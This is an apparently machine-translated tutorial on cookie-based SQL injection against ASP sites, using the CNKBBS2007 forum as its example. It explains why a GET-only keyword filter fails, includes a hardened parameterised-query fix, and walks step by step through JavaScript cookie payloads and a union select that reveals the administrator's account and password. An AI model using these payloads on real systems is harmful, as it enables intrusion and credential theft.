Classic COOKIE injection Principle

Source: Internet
Author: User

Hello everyone, I am a beginner. In the previous lecture we learned about search injection; today let's look at another uncommon injection method, cookie injection. Before we discuss it, let's review the Request object in ASP scripts. In earlier sections we mentioned that the common GET and POST methods obtain client data through collections of the Request object. The Request object can also obtain data without naming a collection: you can write Request("name") directly, but this is inefficient and error-prone. When the collection name is omitted, ASP searches the collections in the order QueryString, Form, Cookies, ServerVariables. Cookies are one of the Request object's collections, which means every cookie value sent by the user's browser is read as well. From the second lecture, "Cookie spoofing intrusion and principles", we know that a cookie is a text file stored on the client computer and can be modified, so we can use the Request.Cookies collection to submit the value of a variable and exploit a vulnerable system for injection.

First, let's look at the latest version of the Network Scene Forum, "(CNKBBS2007) Network Scene Forum 2007 v5.0", official site "http://www.cnetking.com/websys2.asp? Id = 26", the release date is. After opening the source code of the system, the following code appears in the "user_RxMsg_detail.asp" file:

(Call the opendb.asp file)
(Call the fzr.asp file)
..................

This is the file that connects to the database, and it is where fzr.asp is called, so let's open the fzr.asp file.

<%
'-------- Copyright description ------------------
'SQL general anti-injection program
'Aseanleung
'-------- Definition section ------------------
Dim Fy_Post, Fy_Get, Fy_In, Fy_Inf, Fy_Xh, Fy_db, Fy_dbstr
Dim fso1, all_tree2, file1, files, filez, fs1, zruserip

' (Note: only data submitted through Request.QueryString, i.e. by the GET method,
'  is checked; data submitted by other methods is not examined.)
If Request.QueryString <> "" Then
    'Custom string to be filtered, separated by '|'
    ' (Note: blocks the keywords of common SQL injection statements.)
    Fy_In = "'|;|%|*|and|exec|insert|select|delete|update|count|chr|mid|master|truncate|char|declare|script"
    Fy_Inf = Split(Fy_In, "|")
    For Each Fy_Get In Request.QueryString
        For Fy_Xh = 0 To UBound(Fy_Inf)
            ' (A closing parenthesis was missing on this line in the listing as published.)
            If InStr(LCase(Request.QueryString(Fy_Get)), Fy_Inf(Fy_Xh)) <> 0 Then
                zruserip = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
                If zruserip = "" Then zruserip = Request.ServerVariables("REMOTE_ADDR")
                ' (The line breaks inside these strings in the published listing are
                '  rendered <br> tags; a VBScript string literal cannot span lines.)
                Response.Write "Content contains invalid characters! Please do not include ', and, or and so on. Remove these characters and send again!!<br>"
                Response.Write "If you want to attack a website, the system records your operations<br>"
                Response.Write "Operation IP: " & zruserip & "<br>"
                Response.Write "Operation time: " & Now & "<br>"
                Response.Write "Operation page: " & Request.ServerVariables("URL") & "<br>"
                Response.Write "Submission method: GET<br>"
                Response.Write "Submitted parameter: " & Fy_Get & "<br>"
                Response.Write "Submitted data: " & Request.QueryString(Fy_Get)
......................

Obviously, this is the SQL universal anti-injection program file (the parenthetical notes in the listing explain the code).

After reading the code, let's sort out the idea. Because of a programmer's mistake, the id is not filtered before it is used in the SQL query; this is the cause of the injection vulnerability. Although the program includes an anti-injection script to block common SQL statements, that script only examines data submitted with the GET method and ignores data submitted in other ways. As a result, the client can submit the variable's value through the Request.Cookies collection and bypass the SQL anti-injection script. (Summary of the conditions for cookie injection: (1) the system reads client data with Request("name") directly, without naming a collection; (2) the variable submitted by the client is not filtered; and (3) the anti-injection script places no restriction on Request.Cookies. At present, anti-injection program 3.0 only restricts the GET and POST submission methods.)
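As an added example (not code from the CNKBBS forum or from the anti-injection script), here is how user_RxMsg_detail.asp could read the id so that neither the collection fallback of Request("name") described at the start nor the GET-only filter matters: the value is taken from one named collection, allow-listed as digits, and bound as a typed parameter. The column names other than id and the connection string in Application("ConnStr") are assumptions.

```vbscript
<%
Option Explicit
' Added example, not the forum's own code. Hardened read of the message id:
' Request.QueryString("id") is used instead of Request("id"), so a cookie
' named "id" is never consulted and fzr.asp's GET-only filter is irrelevant.
Dim rawId
rawId = CStr(Request.QueryString("id"))

' Allow-list: 1 to 9 decimal digits. This is stricter than IsNumeric, which
' also accepts values such as "1e3", "&H1F" and surrounding spaces.
Dim re
Set re = New RegExp
re.Pattern = "^[0-9]{1,9}$"
If Not re.Test(rawId) Then
    Response.Status = "400 Bad Request"
    Response.Write "Invalid message id."
    Response.End
End If

' Never concatenate the value into SQL; bind it as a typed ADO parameter.
Const adCmdText = 1, adInteger = 3, adParamInput = 1
Dim conn, cmd, rs
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open Application("ConnStr")   ' assumed: connection string kept in Application
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
' cnk_users_RxMsg is the table named on this page; sendtime/content are assumed columns
cmd.CommandText = "SELECT id, sendtime, content FROM cnk_users_RxMsg WHERE id = ?"
cmd.Parameters.Append cmd.CreateParameter("@id", adInteger, adParamInput, , CLng(rawId))
Set rs = cmd.Execute

If rs.EOF Then
    Response.Write "No such message."
Else
    ' Encode on output so stored text cannot inject script into the page.
    Response.Write Server.HTMLEncode(rs("sendtime")) & "<br>"
    Response.Write Server.HTMLEncode(rs("content"))
End If
rs.Close: conn.Close
Set rs = Nothing: Set cmd = Nothing: Set conn = Nothing
%>
```

With the id bound as an integer parameter, a value such as "1 and 1=2 union select ..." is rejected by the digit check before any query runs, whichever collection it arrives in.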

Now let's learn the cookie injection statement.

Cookie injection statement: javascript:alert(document.cookie="id="+escape("xx and (injection attack code here)")); where xx stands for the value that follows asp?id= in the original URL.

The statement uses JavaScript. I break down its meaning as follows for your understanding:

1: alert(): the alert() method displays an information dialog box. It opens a separate small window, called a dialog box, that shows a message and a button. (This is often used in cross-site scripting.)

2: document.cookie: when handling cookies, JavaScript stores them as a property of the document object; the property name is cookie. With this property we can create and read cookie data; in a program you can write alert(document.cookie) to display it.

3: document: the document object represents the HTML displayed in the browser (the output sent to the page). Its cookie property reads and writes the HTTP cookie as a string.

4: escape(): this function converts every character in a string that is not a letter or digit into an equivalent sequence of letters and digits, i.e. it encodes the string. Normally a cookie is sent from the server program to the browser through the HTTP request and response, but with JavaScript you can also set a cookie locally in the browser.

Format: name=value, where name is the name of the cookie data item and value is the string corresponding to that name. The value can contain a series of characters, but neither name nor value may contain semicolons, commas, or white space. A value such as 50 and 1=1 contains white space, so we need the escape() function to encode it.

Now the meaning of the whole statement is clear: it sets the value of the cookie data item that the page will later read. When a cookie is set, it is first kept in the browser's memory and written to the hard disk only when the browser exits. (This is why, in the operations below, the link address is entered afterwards.)

Finally, let's test the procedure:

1: Open the chinnet forum set up on the local host and register a user; we receive a short message from the administrator. Open the short message link (note the parameter id here).

2: Clear the browser address bar and enter javascript:alert(document.cookie="id="+escape("corresponding parameter id value and 1=1")); a dialog box pops up.

3: Then enter http://www.bkjia.com/cnkbbs5.2 _ ac/user_RxMsg_detail.asp? Username = forum administrator (the normal page is returned, showing that the SQL anti-injection script has been bypassed).

4: Enter javascript:alert(document.cookie="id="+escape("1 and 1=2")); then enter http://www.bkjia.com/cnkbbs5.2 _ ac/user_RxMsg_detail.asp? Username = forum administrator (the time and content are not displayed, which means injection is possible).

5: Looking at the system database, the cnk_users_RxMsg table has eight fields, and the Cnk_Admin table stores administrator information; its AdminName and AdminPassword fields hold the account and password. We use a union query: enter javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,2,3,4,5,6,7,8 from Cnk_Admin")); then clear the address bar and enter http://www.bkjia.com/cnkbbs5.2 _ ac/user_RxMsg_detail.asp. The numbers 4 and 5 are displayed.

6: Clear the address bar again and enter javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,2,3,AdminName,AdminPassword,6,7,8 from Cnk_Admin")). After submitting, clear the address bar and enter http://www.bkjia.com/cnkbbs5.2 _ ac/user_RxMsg_detail.asp? Username = forum administrator; the administrator's account and password are then shown on the page.

Another article: how cookie injection arises, written by AD: http://www.bkjia.com/article/200803/24734.html
